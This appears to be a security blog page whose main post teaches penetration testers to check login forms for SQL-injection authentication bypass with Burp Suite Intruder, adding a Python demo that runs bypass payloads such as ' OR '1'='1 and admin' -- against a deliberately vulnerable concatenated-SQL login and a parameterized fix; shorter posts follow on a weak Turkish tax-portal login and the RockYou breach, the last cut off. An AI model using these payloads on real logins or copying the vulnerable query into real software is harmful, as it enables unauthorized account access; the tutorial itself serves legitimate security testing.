A login process that contains an SQL injection vulnerability can be bypassed by an attacker who manipulates the username or password parameter and thereby gains access to the application (possibly even as administrator) without knowing any valid user credentials. This is known as "Authentication Bypass via SQL Injection".

In this post I want to explain how a penetration tester can use Burp Suite's Intruder tool to check for this type of vulnerability automatically. I am also providing an authentication-bypass-list.txt file that contains a set of payloads for testing SQL injection in login forms.

Here are the steps a pentester needs to follow, in order:

1- Within the Proxy tool, intercept the login request and choose the option "Send to Intruder".

2- Within the Intruder tool, go to the Positions tab

"Clear" the default payload markers, select the username and password parameter values and "Add" them as payload positions. For "Attack type", choose "Sniper": with a single payload set, Sniper inserts each entry of authentication-bypass-list.txt into one position at a time (first the username, then the password) while the other parameter keeps the value from the original request. This matters because many bypass payloads only work in one of the two positions.

3- Within the Intruder tool, go to the Payloads tab

As the payload type, choose "Runtime file" and under "Select file" choose the authentication-bypass-list.txt file.

4- Within the Intruder tool, go to the Options tab

The returned HTTP responses need to be analyzed to determine whether the attack was successful or whether error messages (e.g. leaked SQL queries) are returned. Hence, in the "Grep" section, enable "search responses for these expressions" and "Add" the keywords your application returns after a successful login. As an example, my demo application returns a "YOU ARE AUTHENTICATED" message.

5- Start the Attack

Now you can start the attack by clicking Intruder->”Start Attack” on the top menu.

6- Analyze the HTTP Responses

In the final step, you need to check the results to find out whether an authentication bypass was possible. First check whether any of the match expressions you added in the Options tab for a successful login appeared in the responses. Additionally, HTTP responses with status codes 302 (a redirect, typically to the post-login page) and 200 are interesting and need to be analyzed further, e.g. by comparing their length with the normal "login failed" response. HTTP responses with status code 500 can contain critical error messages, sometimes even the SQL query itself. You can use such error messages to craft a customized authentication bypass payload that fits the exact query structure.
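To make the whole procedure concrete, here is an added example (not code from the original post, and not the real authentication-bypass-list.txt) that emulates the Sniper run and the grep check against a deliberately vulnerable login function, side by side with a parameterized one. It assumes an in-memory SQLite users table, a constructed subset of six bypass payloads, the original request "admin" / "wrongpassword", and the "YOU ARE AUTHENTICATED" marker from the demo application; the result also shows why the same payload can succeed in one position and fail in the other.

```python
import sqlite3

# Marker the demo application returns after a successful login (the same
# string added as grep expression in the Intruder Options tab).
SUCCESS_MARKER = "YOU ARE AUTHENTICATED"

# Constructed sample of payloads in the style of authentication-bypass-list.txt
# (assumption for this example, not the real file's contents).
PAYLOADS = [
    "' OR '1'='1",
    "' OR '1'='1' --",
    "admin' --",
    "admin' /*",
    "' OR 1=1 --",
    "') OR ('1'='1",
]

# The original request captured in Proxy: a valid username, wrong password.
BASE_REQUEST = {"username": "admin", "password": "wrongpassword"}


def setup_db():
    """In-memory users table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cr3t!", "admin"), ("alice", "wonderland", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable login: user input is concatenated into the SQL string."""
    query = ("SELECT username, role FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as err:
        # Verbose error page that leaks the query, like the 500 responses in step 6.
        return {"status": 500, "body": "SQL error: %s in: %s" % (err, query)}
    if row:
        return {"status": 200, "body": "%s as %s (%s)" % (SUCCESS_MARKER, row[0], row[1])}
    return {"status": 200, "body": "Login failed"}


def login_safe(conn, username, password):
    """Fixed login: parameterized query, so input can never become SQL syntax."""
    row = conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    if row:
        return {"status": 200, "body": "%s as %s (%s)" % (SUCCESS_MARKER, row[0], row[1])}
    return {"status": 200, "body": "Login failed"}


def run_sniper(login, conn, base_request, payloads, marker=SUCCESS_MARKER):
    """Emulate Intruder's Sniper attack with one runtime-file payload set:
    each payload goes into one marked position at a time while the other
    parameter keeps its original value. 'bypass' is the grep match check,
    'sql_error' the status-500 check from step 6."""
    results = []
    for position in ("username", "password"):
        for payload in payloads:
            params = dict(base_request)
            params[position] = payload
            resp = login(conn, params["username"], params["password"])
            results.append({
                "position": position,
                "payload": payload,
                "status": resp["status"],
                "bypass": marker in resp["body"],
                "sql_error": resp["status"] == 500,
            })
    return results


def bypasses(results):
    """(position, payload) pairs that logged in without the real password."""
    return [(r["position"], r["payload"]) for r in results if r["bypass"]]


if __name__ == "__main__":
    conn = setup_db()
    for name, login in (("vulnerable", login_vulnerable), ("parameterized", login_safe)):
        results = run_sniper(login, conn, BASE_REQUEST, PAYLOADS)
        print("%s login: %d bypasses, %d SQL errors out of %d requests" % (
            name, len(bypasses(results)),
            sum(r["sql_error"] for r in results), len(results)))
        for position, payload in bypasses(results):
            print("  %-8s %r" % (position, payload))
```

Against the vulnerable function the twelve requests yield seven bypasses and two SQL errors (the `') OR ('1'='1` payload assumes a parenthesized query this one does not have, so it produces the leaked-query 500 instead); note that `admin' --` only works in the username position, while `' OR '1'='1` without a comment only works in the password position, which is exactly why both positions are marked. The parameterized version logs nobody in and raises no error for any payload.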

Final Words

I created the authentication-bypass-list.txt file based on the SQL Injection Cheat Sheet of Ferruh Mavituna and the Firefox add-on "SQL Injection", and then extended and enhanced it; the list currently contains 46 entries. To contribute to the list, please contact me via tatli(at)architectingsecurity.com or @eitatli.

In this post I want to continue with the topic of privacy violations.

This time the violation comes from the Revenue Administration (Gelir İdaresi Başkanlığı), which reports to the Ministry of Finance. With an online application, this government body has moved the declaration of rental income onto the Internet. The service is nice, but logging into the application is not secure at all. As the screenshot below shows, all that is needed to enter the application and access personal information is a T.C. identity number and the ID card serial number. We know, however, that this kind of personal information can be obtained with a few small searches on the Internet.

Thanks to this application, it is possible to access the information on many people's rented-out homes and to file rental income declarations in their name. How the person concerned would explain to the authorities, and prove, that someone else filed an incorrect rental declaration in their name is another matter.

What I really wonder about here is this: while the stated goal is for access to the e-services of all government bodies to go through turkiye.gov.tr using the e-Government password, why can some government organizations step outside this scheme so easily, and why is there nobody auditing and correcting this? What is more, the Ministry of Finance is already present on the turkiye.gov.tr platform with its e-Yolluk and e-Bordro applications.


Password Patterns

In December 2009 a major data breach occurred on the Internet: around 32 million user passwords of the rockyou.com web portal were stolen by an attacker who used SQL injection. He obtained all the passwords and made them available for download on the Internet in anonymized form (i.e. without the usernames).

Security experts started analyzing the passwords, and Imperva released a study on the strength of these passwords. They came up with the following results: